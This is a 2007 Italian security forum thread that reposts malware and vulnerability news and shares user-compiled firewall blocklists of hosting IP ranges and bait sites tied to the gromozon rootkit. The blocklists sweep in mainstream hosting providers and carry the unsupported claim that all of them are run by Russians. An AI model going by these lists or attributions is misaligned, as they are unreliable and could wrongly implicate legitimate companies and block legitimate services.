Da quando é possibile fare soldi con i virus il numero di infezioni messe a punto a vere e proprie organizzazioni criminali che hanno la faccia rispettabile di societa' che offrono servizi internet da un lato e dall'altro spammano truffano (scam) e diffondono rootkit difficilissimi da scovare per rubare dai sensibili o fare Ddos è cresciuto esponezialmente. Molto attivi sono i Russi e gli ucraini che adesso se la sono presa con l'italia ma prima hanno fatto sfracelli con lo spam e gli spyware - adware in tutto il mondo. Anche la Spagna mi pare che stia per entrare nell'occhio del ciclone. La cosa incredibile è che la maggior parte dei server sono negli Usa ma ho il sospetto che certe pagine funzionino solo con Ip di certe aree geografiche. Altrimenti gia' sarebbero stati chiusi da un pezzo. Per quelli in russia e ucraina invece ci vuole il kgb e l'intervento di putin :-) :-)

Infatti sembra che l'infezione sia per quelli non di lingua inglese.
---www.eazel.com--- che il sito principale poi ha dei link in varie lingue. Tutti i link con la bandiera francese italiana tedesca portoghese
sono identici e sembrano archivi di programmi ma in realta' ne hanno solo
1 che è un virus.

Per la versione spagnola c'è ----www.ircfast.com---------


Ormai per quello che ho visto navigare sul web con windows crea molti problemi per via degli exploit che vengono utilizzati da pagine che sono posizionate nei primi risultati di google.Per cui è molto facile finirci sopra. Il problema principale è il mezzo di diffusione che è cambiato. Prima era la posta che ormai funziona molto poco visto che adesso si possono utilizzate le webmail
mentre ora sono i motori di ricerca. Forse è il caso di comunicare a Google iItalia, Yahoo e MSN di escludere le pagine web ospitati da questi server (tutti gestiti da russi)

195.225.176.0-195.225.179.255 NETCATHOST Ucraina
195.234.159.0 - 195.234.159.255 LINO-NET Israele
85.255.112.0-85.255.127.255 Inhoster hosting company Ucraina
69.50.160.0-69.50.191.255 InterCage, Inc. USA
81.29.240.0-81.29.242.63 GLOBALTRADE-NET-1 Russia
67.15.64.166-67.15.64.168 Exploit su questi 3 ip USA
69.31.0.0 - 69.31.143.255 Pilosoft, Inc USA
66.230.128.0 - 66.230.191.255 ISPrime, Inc USA
208.66.195.78 McColo Corporation USA (probabilmente tutto il range)
204.13.160.26 Oversee.net USA (probabilmente tutto il range)
216.195.32.0 - 216.195.63.255 Dimago Overseas GmbH NET
216.255.176.0 - 216.255.191.255 InterCage USA

mentre questo Ip 209.85.60.76

è quello del malware di 1mb (non mi pare la stessa mano di quelli di gromozon... forse sono spagnoli)

Bloccateli sul firewall
intervento di mausap.

giannola
31-01-2007, 14:20
Roma, 30/01/2007 - Prima di partire per la prossima gita fuori porta, controllate che il navigatore GPS non sia infetto da malware e virus informatici. Allarma e fa discutere le società di sicurezza la notizia della commercializzazione del primo "TomTom con virus", inclusivo di software malevoli pensati, neanche a dirlo, per colpire i PC basati sui sistemi operativi della famiglia Windows.


Mentre scriviamo la società produttrice della famosa linea di navigatori non ha ancora rilasciato comunicazioni ufficiali al grande pubblico: l'infezione interesserebbe una partita di dispositivi della serie TomTom GO 910 prodotta tra settembre e novembre 2006 che, se collegati ad un PC dotato di antivirus, farebbero scattare la protezione in tempo reale di quest'ultimo.

In particolare, l'antivirus segnalerebbe come infetti i file copy.exe e host.exe, presenti sulla directory radice del disco fisso integrato nel TomTom, contenenti rispettivamente il file virus Win32.Perlovga.A e il trojan horse TR/Drop.Small.qp. I malware, stando a quanto segnala il weblog di F-Secure, sono ben noti sin da gennaio 2005 (il trojan) e da giugno 2006 (il virus), e a quanto assicurano gli esperti, sono da considerarsi rischi di basso profilo per il sistema degli utenti.

Non correrebbe poi rischi il dispositivo in sé, non facendo parte della dotazione standard del navigatore i due file eseguibili infetti. Ma c'è chi si meraviglia perché la società che produce i TomTom non abbia ancora preso posizione sulla cosa. Stando a quanto riportato inizialmente da DaniWeb, dopo la segnalazione dell'inghippo la società ha inviato una stringata mail con la descrizione del problema, contenente infine il consiglio di lasciar cancellare i bacilli al software antivirus.

Ad ora, non è stato pubblicato alcun avviso sul sito web del navigatore né risultano annunci ufficiali sul potenziale allarme. Ma va detto che non è certo il primo della serie: ha fatto storia l'individuazione, l'ottobre scorso, di un malware in alcuni iPod di Apple, e prima ancora la scoperta di un keylogger, software spione sniffa-informazioni, nei lettori MP3 distribuiti da McDonalds Japan.

Alfonso Maruccia (punto informatico)

Update ore 17

Sul proprio sito, TomTom ha ora pubblicato un'analisi del problema. L'azienda consiglia di aggiornare i propri software antivirus o di ricorrere al check antivirus gratuito offerto da alcune importanti società di settore.

giannola
31-01-2007, 14:24
Roma - Symantec ha recentemente scoperto un nuovo cavallo di Troia, battezzato Mdropper.m, capace di sfruttare un'inedita vulnerabilità di MS Word 2000. Quest'ultima si aggiunge alle altre tre falle zero-day scoperte a dicembre e tuttora senza patch.

Il nuovo trojan si cela all'interno di un documento Word e viene eseguito quando l'utente apre il file. Una volta in memoria, Mdropper.m crea una backdoor utilizzabile da un cracker per accedere al sistema da remoto.

In questo advisory Microsoft ha confermato l'esistenza del problema, ma ha anche spiegato che il bug interessa esclusivamente l'ormai anziano Word 2000. Alcuni esperti di sicurezza sostengono tuttavia che l'exploit può causare qualche noia anche agli utenti di Word 2002 e Word 2003, questo a causa di un anomalo consumo di risorse di calcolo.

FrSIRT e Secunia giudicano la falla di Word 2000 della massima pericolosità.

Gli esperti affermano che bug come questi vengono generalmente utilizzati dai cracker per ottenere il pieno controllo di un sistema vulnerabile da remoto.

(punto informatico)

wizard1993
31-01-2007, 15:31
sono felice di segnalare; che da la bellezza di 2 settimane tutti gli osservtori ativirus concordano sul fatto che non ci siano grandi epidemie in corso. chi vole andare a prendersi una birra faccia pure

giannola
31-01-2007, 16:21
sono felice di segnalare; che da la bellezza di 2 settimane tutti gli osservtori ativirus concordano sul fatto che non ci siano grandi epidemie in corso. chi vole andare a prendersi una birra faccia pure

offro io :D

mausap
02-02-2007, 10:19
Una nuova enorme quantita' di siti civetta con exploit è presente su google.
Quindo mi raccomando di fare molta attenzione.

Occhio a ----mprogrammi.net---- che è molto facile finirci sopra.

----www.msnwm.com--- è un altro sito di gromozon

Questi sono nuovi di zecca.

.......theheretik.us/
.......vegnews.com/
.......softwaregarden.com
........cowpalace.com/
.........cahme.org/
.........ai-tech.com/
.........cgexpo.com/

ma è impossibile postarli tutti.

c'è anche un dialerino tanto per non farsi mancare nulla, sexo.exe (ma fortunamente mi pare che venga per riconosciuto da quasi tutti gli antivirus)

Gli Ip da bloccare

209.85.0.0 - 209.85.127.255 Everyones Internet USA
65.23.128.0 - 65.23.159.255 Datarealm Internet Services USA
64.111.192.0 - 64.111.223.255 ISPrime, Inc. USA

NON ANDATECI ASSOLUTAMENTE e se proprio dovete mai senza aver disabiltato java e js se ci andate con Firefox. Con I.E. è da masochisti!!!!!!

La backlist degli Ip usati dai russi di gromozon cresce sempre.

giannola
02-02-2007, 14:15
2/2/07 Cupertino (USA) - Gli smartphone e i PDA su cui gira Windows Mobile contengono due bug che potrebbero renderli facile bersaglio di attacchi di tipo denial of service. A dirlo è la nota società di sicurezza Trend Micro, che negli scorsi giorni ha pubblicato un paio di advisory dove spiega che entrambi i problemi possono causare il completo blocco del dispositivo.

I bug interessano le versioni 5.0 e 2003 di Windows Mobile e sono contenuti nella versione pocket di Internet Explorer e in Pictures and Video, l'applicazione dedicata alla riproduzione dei contenuti multimediali.

Il bug di IE, di tipo stack overflow, potrebbe essere innescato dall'apertura di una pagina Web maligna e causare la chiusura improvvisa del browser nonché l'instabilità del sistema. Per far tornare il dispositivo a funzionare correttamente è necessario riavviarlo.

Il bug di Pictures and Video è invece innescato dall'apertura di una immagine JPEG malformata e, secondo Trend Micro, può congelare l'intero sistema per circa 10-15 minuti: dal momento che in questo lasso di tempo non appare alcun messaggio di errore, l'utente potrebbe pensare ad un crash e riavviare il dispositivo perdendo eventualmente dati e messaggi non salvati.

Fortunatamente nessuno dei due bug può essere utilizzato per compromettere la sicurezza del sistema.

Microsoft ha dichiarato che sta investigando sui due problemi e di essere pronta, nel caso ce ne fosse bisogno, a distribuire ai produttori di device un firmware aggiornato da mettere a disposizione dei loro utenti. Fino al rilascio di una patch, Trend Micro suggerisce agli utenti di non aprire pagine Web sconosciute e immagini JPEG provenienti da fonti non affidabili.


INOLTRE:
Nelle scorse ore diverse fonti, tra cui Symantec e FrSIRT, hanno segnalato una vulnerabilià zero-day di Word che, se inedita, sarebbe la quinta nel giro di due mesi: l'ultima è stata scoperta solo pochi giorni fa. Un portavoce di Microsoft ha però affermato che, dalle prime indagini, sarebbe emerso che la nuova vulnerabilità è in realtà "un doppione", ovvero un problema già pubblicamente noto. In ogni caso, FrSIRT riporta che il bug - classificato critical - non è ancora stato corretto.

Secondo Symantec, la debolezza interessa Word 2003, 2002 e 2000 e viene attualmente sfruttata da un worm, battezzato Mdropper.X, che si cela all'interno di un allegato di posta elettronica.

(punto informatico)

giannola
03-02-2007, 13:52
Non è di prima mano ma reputo sia utile a fini conoscitivi. ;)

30/11/2006
McAfee ha reso note le sue previsioni su quali saranno le 10 principali minacce di sicurezza nel 2007 stilate da McAfeeâ Avert Labs. Secondo i dati e con oltre 217.000 diverse tipologie di minacce note e altre non ancora identificate, è chiaro che il malware viene rilasciato sempre più da criminali professionisti e organizzati.
I siti web che “rubano” le password sono in aumento
Nel 2007 saranno sempre più frequenti attacchi che cercano di catturare l’identità e la password degli utenti visualizzando una pagina di sign-in fasulla e aumenteranno quelli volti a colpire servizi online popolari come eBay. Come testimoniato dagli attacchi di phishing che hanno seguito l’uragano Katrina, si prevede anche un maggior numero di attacchi che si avvantaggiano della volontà e disponibilità della gente di aiutare i bisognosi. Per contro, il numero degli attacchi contro gli ISP dovrebbe diminuire mentre gli attacchi volti a colpire il settore finanziario rimarranno stabili.

Lo spam, e in particolare lo spam di immagini, è in crescita
Nel novembre 2006, lo spam di immagini ha rappresentato oltre il 40% dello spam totale ricevuto, rispetto a meno del 10% di un anno fa. Lo spam basato su immagini ha una dimensione tipica che è tre volte maggiore a quella di spam basato su testo, perciò si tratta di un aumento significativo nella larghezza di banda utilizzata dai messaggi di spam classici.

La popolarità dei video sul Web li renderà un obiettivo degli cracker
Il crescente utilizzo di formati video su siti di social networking come MySpace, YouTube e VideoCodeZone porterà gli autori di malware a cercare di penetrare all’interno di una rete ampia. Diversamente dalle situazioni che coinvolgono gli allegati email, la maggior parte degli utenti avrà la tendenza ad aprire file multimediali senza alcuna esitazione. Inoltre, poiché il video è un formato semplice da utilizzare, funzionalità come il padding, pubblicità pop-up e reindirizzamento URL diventano gli strumenti di distruzione ideali per gli autori di malware. Insieme, tali problematiche rendono molto probabile un efficace successo degli scrittori di codice malevolo che sfruttano il media malware.

Il worm W32/Realor, scoperto all’inizio di Novembre 2006 da McAfee Avert Labs, rappresenta un caso recente di media malware. Il worm è in grado di lanciare siti web malevoli senza indicazioni da parte dell’utente, esponendo così gli utenti all’attacco di bot o ladri di password caricati su tali siti. Altro media malware come Exploit-WinAmpPLS potrebbe installare di nascosto dello spyware con un’interazione minima da parte dell’utente. Con la diffusione sul web di reti per la condivisione di video e filmati, la possibilità di catturare l’attenzione di un vasto pubblico inciterà gli autori di malware a sfruttare tali canali per ottenere un guadagno economico.

Crescono gli attacchi mobile
Le minacce mobile continueranno a crescere di pari passo con la convergenza tra piattaforme diverse. L’utilizzo della tecnologia degli smartphone ha giocato un ruolo fondamentale nel passaggio delle minacce da PC multifunzione, semi-stazionari a dispositivi palmari “indossabili”. Con l’incremento nella diffusione di connessioni BlueTooth, SMS, instant messaging, email, WiFi, USB, audio, video e Web crescono le possibilità di contaminazione incrociata dei diversi dispositivi.

Il 2006 è stato testimone dei tentativi da parte degli autori di malware mobile di realizzare vettori d’infezione PC-verso-telefono e telefono-verso-PC. Il vettore PC-verso-telefono è stato realizzato creando MSIL/Xrove.A, un malware .NET che può infettare uno smartphone tramite ActiveSync. I vettori telefono-verso-PC esistenti al momento sono in uno stadio ancora primitivo, per esempio quelli che infettano tramite schede di memoria rimovibili. Comunque, McAfee prevede che il secondo livello successivo verranno raggiunto nel corso del 2007.

Anche lo SMiShing, che prevede che le tradizionali tecniche di phishing tramite email vengano sfruttano via SMS (da qui la definizione di SMiShing invece di phishing), vivrà un aumento.

Inoltre, per il 2007 si prevede un aumento anche del malware mobile a fini di lucro. La prospettiva è cambiata con il Trojan J2ME/Redbrowser Trojan un programma Trojan horse che finge di accedere a pagine web WAP (Wireless Access Protocol) tramite messaggi SMS. In realtà, invece di recuperare le pagine WAP, invia messaggi SMS a numeri telefonici a tariffa maggiorata, costando così all’utente molto più di quanto previsto. Anche un secondo J2ME, Wesber, comparso nel corso del 2006, invia messaggi a un numero SMS a tariffa maggiorata.

La fine del 2006 ha registrato un turbine di offerte di spyware nel mondo mobile. La maggior parte vengono creati per monitorare numeri telefonici e registri di chiamate SMS, o per rubare messaggi SMS inoltrandoli a un altro telefono. Uno spyware in particolare, SymbOS/Flexispy.B, è in grado di attivare remotamente il microfono del dispositivo della vittima, permettendo ad altri di origliare le conversazioni di quella persona. Ci sono altri spyware che possono attivare la macchina fotografica. McAfee prevede che l’offerta di spyware commerciale volto a colpire i dispositivi mobile crescerà nel corso del 2007.

L’adware si diffonderà ampiamente
Nel 2006, McAfee Avert Labs ha registrato un aumento dei programmi indesiderati o Potentially Unwanted Programs (PUPs) commerciali, e una crescita ancora maggiore in tipologie correlate di Trojan malevoli, in particolare keylogger, password-stealer, bot e backdoor. Inoltre, è in aumento l’uso improprio di software commerciale da parte del malware che implementa, controllandoli da remoto, adware, keylogger e software di controllo remoto.


Furto d’identità e perdita dei dati continueranno a essere un problema pubblico
Secondo l’U.S. Federal Trade Commission, ogni anno circa 10 milioni di americani sono vittime di frodi legate all’identità. Alla radice di questi crimini vi è spesso la perdita di un computer, perdita di backup o sistemi informatici compromessi. Mentre McAfee prevede che il numero di vittime rimarrà stabile, aziende che rendono pubblica la perdita o il furto di dati, un crescente numero di furti informatici e attacchi di cracker su sistemi ATM e di pagamento, e la segnalazione di furti di laptop che contengono dati confidenziali continueranno a fare di questo argomento un elemento di preoccupazione pubblica.

Anche i bot aumenteranno
I Bot, programmi informatici che eseguono task automatici, sono in crescita, ma si sposteranno da meccanismi di comunicazioni che sfruttano Internet Relay Chat (IRC) verso metodi meno invadenti. Anche i cosiddetti “Muli” continueranno a costituire un aspetto importante nei piani per guadagnare denaro tramite bot. Si tratta di lavori da svolgere a casa che vengono offerti attraverso siti web dall’aspetto estremamente professionale, tramite annunci economici e anche tramite instant messaging (IM). Questi rappresentano un elemento cruciale del motivo per cui così tante bot sono in grado di essere eseguiti da qualunque posto nel mondo. Per poter ottenere merce (spesso da rivendere) o denaro con credenziali di carte di credito rubate, i ladri devono sottostare a normative più severe se i beni devono andare in altre nazioni. Per aggirare tali normative, utilizzano i cosiddetti “muli” all’interno delle nazioni d’origine.

Il ritorno del malware parassitario
Sebbene il malware parassitario conti poco meno del 10% di tutto il malware (il 90% del malware è statico), sembra che sia tornato di moda. Gli agenti infettanti parassiti sono virus che modificano i file esistenti su un disco, inseriscono codice all’interno del file laddove si trova. Quando l’utente esegue il file infetto, parte anche il virus. W32/Bacalid, W32/Polip e W32Detnat sono tre parassiti infettanti polimorfi popolari identificati nel 2006 che hanno funzionalità stealth e cercano di scaricare i Trojan da siti web compromessi.

All’inizio di questo mese, McAfee Avert Labs ha anche tracciato e monitorato il payload implementato da W32/Kibik.a, un exploit parassita e zero-day che include euristica rootkit, rilevamento comportamentale e blacklist di indirizzi IP che sono stati l’argomento di discussione della comunità della sicurezza negli anni recenti. W32/Kibik.a fa un interessante tentativo di sopravvivere nel panorama competitivo odierno. Dall’installazione silenziosa tramite un exploit zero-day, a permanenza e attività silenziose e ricerche Google silenziose e apparentemente innocenti; W32/Kibik.a potrebbe essere l’inizio di un nuovo trend per il 2007 nel malware scalabile controllato da remoto (noto anche come botnet). Non sorprende che, grazie ai suoi elementi clandestini, pochi fornitori di sicurezza ad oggi abbiamo rilevato o trovato una cura per W32/Kibik.a.

I rootkit cresceranno sulle piattaforme a 32-bit
Ma cresceranno anche le funzionalità di protezione e remediation. Sulle piattaforme a 64-bit, in particolare Vista, i trend del malware sono difficili da prevedere in attesa dei tassi di utilizzo della piattaforma a 64-bit, ma in generale McAfee Avert Labs prevede:

Le vulnerabilità continuano a preoccupare
Si prevede che il numero delle vulnerabilità rese note aumenterà nel 2007. A questo punto del 2006, Microsoft ha annunciato 140 vulnerabilità attraverso il suo programma mensile di patch. McAfee Avert Labs prevede che tale cifra aumenterà a causa del crescente utilizzo di "fuzzer" che rendono possibile test su larga scala delle applicazioni, e a causa del programma di ricompensa che premia i ricercatori che trovano delle vulnerabilità.

(i-dome.com)

giannola
03-02-2007, 13:58
Webroot Software, società leader nello sviluppo di software antispyware per aziende, utenti individuali e PMI, ha messo in evidenza la potenziale inefficacia delle funzionalità di blocco di Windows Defender, la lentezza negli aggiornamenti delle definizioni e le deboli capacità antivirus nelle componenti anti-spyware e antivirus di default del sistema operativo Microsoft Windows Vista e della suite Live OneCare.

"Apprezziamo Microsoft per i sostanziali miglioramenti e le eccellenti nuove funzionalità offerte da Windows Vista. Le differenti applicazioni integrate, i miglioramenti a livello di networking ed il più avanzato supporto grafico lo rendono un prodotto degno di nota", ha detto Gerhard Eschelbeck, CTO e SVP of engineering di Webroot Software. "Detto questo, vogliamo che gli utenti abbiano chiare le limitazioni del sistema operativo Vista, e siano consapevoli del fatto che le applicazioni di blocco del malware ed i programmi antivirus di default di Microsoft potrebbero non proteggerli completamente. Con la sempre maggiore ingegnosità e ostinazione dei cyber criminali e dei creatori di malware, è fondamentale che gli utenti adottino un'ulteriore e provata soluzione di sicurezza in grado di proteggerli in tempo reale da ogni forma di spyware e virus."

Deboli capacità di blocco dello spyware
Durante i test realizzati dal team Threat Research di Webroot è emerso che Windows Defender non è stato in grado di bloccare l'84% di un campione che comprendeva 15 tra le più comuni varianti di spyware e malware esistenti. Esaminandone la capacità di bloccare spyware e malware prima che abbia infettato la macchina dell'utente, il team Threat Research di Webroot ha scoperto che le prestazioni di Windows Defender non sono state al livello di molte applicazioni di sicurezza di terze parti, compreso lo stesso programma anti-spyware di Webroot, Spy Sweeper. Minacce di vario tipo – tra cui adware, programmi potenzialmente indesiderati (PUP, o Potentially Unwanted Programs), system monitor, keylogger e trojan – sono rimaste nell'ambiente di test senza che fossero trovate da Windows Vista. Uno dei PUP testati è stato in grado di installarsi con i privilegi di administrator, avviarsi e catturare dati immessi dalla tastiera senza alcuna reazione dell'ambiente operativo Windows XP, e senza che Defender lo identificasse come applicazione in esecuzione.

La lentezza negli aggiornamenti delle definizioni crea vulnerabilità
Le inefficienze nel sistema di sicurezza di Windows Vista vanno oltre i problemi nel blocco degli spyware. Attualmente Microsoft pubblica aggiornamenti alle definizioni dello spyware per il suo prodotto Windows Defender ogni sette-dieci giorni. Se questo può sembrare un ritmo adeguato, il team Threat Research di Webroot identifica in media ogni mese 3.000 nuove tracce di spyware ed altre applicazioni indesiderate, e rilascia ogni ora o ogni giorno, sulla base delle necessità, aggiornamenti alle definizioni dello spyware.

Un antivirus potenzialmente sensibile a costi aggiuntivi
Webroot segnala che le debolezze di sicurezza nel sistema operativo Windows Vista non si limitano allo spyware, ma potrebbero esporre l'utente anche a pericoli derivanti da virus e da altre forme di malware. Secondo una ricerca eseguita da analisti ed aziende leader nel settore degli antivirus, il sistema operativo Microsoft Windows Vista è potenzialmente sensibile ad alcune delle più comuni minacce virus e malware a causa di problemi legati al controllo dell'accesso degli utenti e all'incapacità di identificare alcuni virus comuni. Inoltre, la protezione antivirus per gli utenti di Microsoft Vista non è gratuita. Per ottenere protezione antivirus, devono infatti acquistare la suite Microsoft Live OneCare al prezzo di 49,95 dollari.

"Comprendiamo che l'obiettivo principale di Microsoft sia quello di realizzare un nuovo sistema operativo in grado di migliorare in generale l'ambiente di elaborazione a disposizione degli utenti, e crediamo che Windows Vista sia in questo senso un ottimo risultato", aggiunge Eschelbeck. "Ma, come azienda in prima fila nella battaglia contro lo spyware ed il crimine informatico, crediamo fortemente che per offrire agli utenti di Internet la migliore protezione, la sicurezza debba essere la priorità assoluta. Contiamo sul fatto che, comunicando queste possibili debolezze nella sicurezza del sistema operativo Windows Vista, gli utenti siano in grado di prendere decisioni maggiormente informate sulle proprie necessità di sicurezza."

Per sapere di più sui prodotti Webroot e sulle necessità di sicurezza legate al passaggio a Vista, è possibile visitare www.webroot.com/vista.


(i-dome.com)

giannola
03-02-2007, 14:02
Sun Microsystems, così come le varie aziende attive nel campo della sicurezza informatica, lanciano l'allerta circa una nuova pericolosa vulnerabilità scoperta nel Java Runtime Environment (JRE), nello specifico all'interno delle versioni "5.0 update 9" e precedenti, 1.4.2_12 e precedenti, 1.3.1_18 e precedenti.

La falla, appena messa a nudo, è stata subito marcata da Secunia come "altamente critica" (ved. questo bollettino (http://secunia.com/advisories/23757/)): il rischio è infatti elevatissimo dato che, visitando un sito web con una versione "datata" di JRE, si potrebbe vedere eseguire codice potenzialmente dannoso sul proprio sistema. Un aggressore potrebbe sfruttare il problema semplicemente creando un'immagine GIF, confezionata "ad arte", inserendola per esempio in una normale pagina web.

Sempre all'interno di Sun JRE e JDK, appena poco meno di un mese fa, erano state rilevate altre vulnerabilità particolarmente critiche: alcune di esse possono essere sfruttate da remoto per danneggiare il contenuto del sistema-vittima oppure per acquisire privilegi più elevati (applet maligne, potrebbero quindi essere in grado, di leggere e scrivere file sul personal computer dell'utente od avviare operazioni pericolose).

Tutti gli utenti sono invitati ad aggiornarsi alle versioni più recenti, esenti da problemi. Sun caldeggia la disinstallazione delle precedenti release e l'adozione della JRE 5.0 (versione 1.5.0_10; denominata anche "1.5 Update 10").
(ilsoftware.it)

wizard1993
03-02-2007, 16:12
compari; da virus bullettin la notizia che il 63.62 % delle infezioni e dato da W32/Detnat; sto cercando una cura in questo momento

juninho85
04-02-2007, 11:08
nel caso fossero passati inosservati,segnalo questi due articoli:
2007: l'anno della "e-criminalità" organizzata (http://www.hwupgrade.it/news/sicurezza/2007-l-anno-della-e-criminalita-organizzata_20018.html)
I principali malware del 2006 in Italia (http://www.hwupgrade.it/articoli/sicurezza/1633/i-principali-malware-del-2006-in-italia_index.html)

giannola
04-02-2007, 16:59
intanto aggiungo un indirizzo (anche in testa) per aiutare chi è affetto da rootkits:

http://www.steven.altervista.org/files/antirootkit.html

registriamo anche una nuova variante del rootkit.dialcall:
http://www.pcalsicuro.com/main/2007/01/nuova-variante-rootkitdialcall/


inoltre un incoraggiante articolo dal titolo "I Rootkit minacciano Windows" da leggere e ricordare:

http://www.megalab.it/news.php?id=1076

e questo per mettere i brividi e a confermare i miei timori sui rootkit totalmente invisibili:

http://www.tomshw.it/news.php?newsid=6902

la cosa che mi spaventa ulteriormente è che l'articolo è del luglio scorso, chissà cosa avranno avuto il tempo di combinare nel frattempo.

edit nel frattempo hanno combinato nell'ordine:

http://puntodivista.wordpress.com/2006/08/04/blue-pill-rootkit-violata-la-sicurezza-in-windows-vista/


http://www.tweakness.net/index.php?topic=3050

wizard1993
04-02-2007, 18:56
nuovo bug in office; made in secunia
http://secunia.com/advisories/24008/

giannola
04-02-2007, 19:31
nuovo bug in office; made in secunia
http://secunia.com/advisories/24008/

che vanno a fare il paio con le criticità che ho messo in elenco per word alcuni post fa. ;)

Cos'è si stanno divertendo a trovare quanti più bachi possibili per office ? :mbe:
Siamo proprio ben messi. :sofico:

mausap
06-02-2007, 01:32
La lista come sempre si trova anche sul mio blog maipiugromozon.blogspot.com

C'è una nuova ondata di siti civetta anche .it


LISTA AGGIORNATA AL 6/2/2007

195.225.176.0-195.225.179.255 NETCATHOST Ucraina
195.234.159.0 - 195.234.159.255 LINO-NET Israele
85.255.112.0-85.255.127.255 Inhoster hosting company Ucraina
69.50.160.0-69.50.191.255 InterCage, Inc. USA
81.29.240.0-81.29.242.63 GLOBALTRADE-NET-1 Russia
67.15.64.166-67.15.64.168 Exploit su questi 3 ip USA
69.31.0.0 - 69.31.143.255 Pilosoft, Inc USA
66.230.128.0 - 66.230.191.255 ISPrime, Inc USA
208.66.195.78 McColo Corporation USA (probabilmente tutto il range)
204.13.160.26 Oversee.net USA (probabilmente tutto il range)
216.195.32.0 - 216.195.63.255 Dimago Overseas GmbH NET
216.255.176.0 - 216.255.191.255 InterCage USA
195.95.218.0 - 195.95.219.255 INHOSTER Ucraina
69.22.128.0 - 69.22.191.255 nLayer Communications - InterCage USA
64.28.176.0 - 64.28.191.255 Cernel, Inc - InterCage, Inc. USA
216.32.0.0 - 216.35.255.255 Savvis Layered Technologies, Inc. (famoso per il phishing di numerose banche e anche di posteitaliane )
208.101.0.0 - 208.101.63.255 SoftLayer Technologies Inc. USA
209.85.0.0 - 209.85.127.255 Everyones Internet USA
65.23.128.0 - 65.23.159.255 Datarealm Internet Services USA
64.111.192.0 - 64.111.223.255 ISPrime, Inc. USA
69.61.0.0 - 69.61.127.255 Global Compass, Inc. USA
213.186.116.0 - 213.186.116.255 Utel DataCenter networks. Colocation Ucraina
82.196.5.221 http21.ifrance.com Francia
70.84.0.0 - 70.87.255.255 ThePlanet.com Internet Services, Inc. USA
216.240.128.0 - 216.240.159.255 ATMLINK, INC. USA
216.195.32.0 - 216.195.63.255 APS Telecom USA
209.66.64.0 - 209.66.127.255 Abovenet Communications, Inc Usa
195.242.98.0 - 195.242.99.255 INTERNETWORX Olanda

67.15.0.0 - 67.15.255.255 Everyones Internet (sopra ho segnalato i 3 ip con l'exploit - In questo blocco ci sono anche altri siti civetta ma c'è anche il sito di Agnitum Outpost e ad anche l'update del famoso firewall per cui non è possibile bloccarlo tutto)

Mi scuso per il grossolano errore prontamente segnalatomi





Tutti gestiti da russi


Da verificare (sospetti)

209.59.128.0 - 209.59.191.255 Liquid Web Inc.
209.97.192.0 - 209.97.223.255 RackForce Hosting Inc.
69.20.0.0 - 69.20.127.255 Rackspace.com, Ltd.
207.97.192.0 - 207.97.255.255 Rackspace.com, Ltd.
198.87.0.0 - 198.88.255.255 NTT America, Inc.
66.150.0.0 - 66.151.255.255 Internap Network Services

juninho85
07-02-2007, 22:56
Ieri - martedi 6 febbraio 2007 - tredici super-server ( root server )della UltraDns che gestiscono il traffico mondiale di internet sonostati sottoposti ad un´aggressione massiccia e sistematica da partedegli hacker.

L´aggressione, organizzata metodicamente, ha lanciato un attacco ditipo DDOS ( distributed denial of service ) mirante a paralizzare eblocccare il traffico mondiale sul Web, è cominciato alle 5:30 a.m. edè durato molte ore, ma già alle 10,30 a.m. gli Internet serviceproviders erano in grado di filtrare e dirigere il trafico in modo chegli utenti non avessero grandi problemi.

Per tutta la durata dell´attacco la navigazione globale in internet nonè mai stata realmente interrotta, ed ha solo subito dei rallentamentiper lo più nemmeno avvertiti dagli utenti privati. In effetti solo duedei tredici root server ha avuto problemi seri a acusa dell´aggressionee solo nel periodo della sua durata - trattandosi di un attacco DDOS -ma fra i tredici server ne erano compresi uno del DipartimentoStatunitense della Difesa e un altro dell´ICANN, l´Ente che assegnanomi e numeri e indirizzi IP ai domini.

Si ritiene che l´obiettivo dell´attacco fosse dimostrativo o meramenteesibizionistico, certo è che si è trattato di un attacco premeditato eorgazizzato - il più pesante dall´ottobre 2002 - e, soprattutto, di unattacco mirato contro bersagli precisi e delicati.

juninho85
07-02-2007, 22:56
Vinton Cerf, uno dei genitori del fondamentale protocollo TCP/IP,lo ha denunciato di recente: il malware di ultima generazione foraggiato dalla nuova criminalità organizzata minaccia seriamente il normale funzionamento della rete. Oberata di spam, attacchi DoS e congestione di traffico artificiosamente generato, Internet è ad un bivio. Un problema talmente sentito, quello dei nuovi malware, che ogni azione di contrasto andata a buon fine fa sempre notizia.

Accade ad esempio in Olanda dove, dopola recente condanna degli autori del worm Toxbot, usato per carpire informazioni finanziarie e ricattare gli esercenti online, un noto spammerè stato condannato al pagamento di una multa salata per la propria attività spara-immondizia. Opta, società che regolamenta le telecomunicazioni del paese, ha deciso di multare tale Mr X per 75mila euro, a risarcimento della compromissione di circa 700 PC controllati da remoto.

La botnet così realizzata ha permesso al criminale di inviare qualcosa comenove miliardi di messaggi-spazzatura in un periodo di 14 mesi, facendo guadagnare all´autore 40mila euro prima di essere acciuffato nel novembre del 2005. Secondo quanto riferito da Opta, Microsoft ha assistito i suoi funzionari nel corso delle indagini, e il signor X ha cercato di mitigare la pena sostenendo che, al tempo dell´arresto, aveva già dismesso la propria attività di spammer. Non perché fosse pentito, ma semplicemente perché (sic) non stava "guadagnando abbastanza denaro".

Si èconclusa anche la storia dell´autore di Samy, il worm che riuscì adinfettare milioni di profili MySpace nell´ottobre del 2005. Usando codiceAJAX, l´allora diciannovenne Samy Kamkar riuscì a bypassare i filtri javascript del portale di Rupert Murdoch e a segnare ognuna delle pagine web compromesse con la stringa di testo "but most of all, Samy is my hero".

Ora il giovane virus writer ha ammesso le proprie colpe, ed è stato condannato a 3 anni di libertà condizionata e al pagamento dei danni a MySpace, oltre che all´allontanamento da Internet per la durata della condizionale. Parrebbe che gli intenti dell´incursore non fossero affatto maliziosi: voleva solo farsi pubblicità e guadagnare considerazione presso il pubblico femminile, nella malintesa idea che "le ragazze vogliono ragazzi che abbiano abilità di hacking dei computer".

Arriva infine dalla California del Sud l´ennesima storia dicontraffazione di software originale: dopo otto mesi di investigazioni, le autorità di polizia hanno individuato e arrestato un pirata informatico che aveva messo su una piccola fortuna con le copie illegali di software Microsoft e Adobe. Gad Zamir, di 64 anni, è stato "beccato" dagli agenti con 13mila dollari in contante, 15 computer (usati con l´evidenza del caso per realizzare le copie) e software illecitamente replicato per un valore di 283mila dollari.


